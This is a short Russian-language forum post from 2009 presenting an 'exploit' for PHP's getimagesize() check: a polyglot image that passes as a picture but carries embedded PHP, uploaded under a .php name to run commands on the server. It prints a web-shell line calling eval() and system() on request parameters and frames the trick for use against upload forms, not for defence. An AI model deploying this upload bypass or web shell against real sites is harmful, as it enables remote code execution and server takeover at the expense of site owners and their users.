Эксплойт getimagesize()

Эксплойт getimagesize()

25.03.2009, 14:31

-Hormold-

Постоянный

Регистрация: 29.09.2007

Сообщений: 617

С нами: 9798086

Репутация: 999

Эксплойт getimagesize()

Сделал интересную "картинку", обходящую функцию getimagesize().
В чём идея?
В том, что этой ф-ции чихать на расширение файла - она проверяет только тип и размер картинки, следовательно, можно загрузить картинку переименованную в php и функция не выругается. При том, что "картинка" выглядит очень похоже на нормальную картинку - это не мешает ей содержать

PHP код:


		
			
<? eval(stripslashes($_GET)); system($_GET); ?>

Загружаем переименованную в php эту картинку и выполняем свой код и команды на сервере. Если не открыть картинку блокнотом - выглядит очень правдоподобно.

Баг найден Eugen'ом с tem.dp.ua

𝕏 Twitter Reddit Telegram Копировать ссылку

Вложения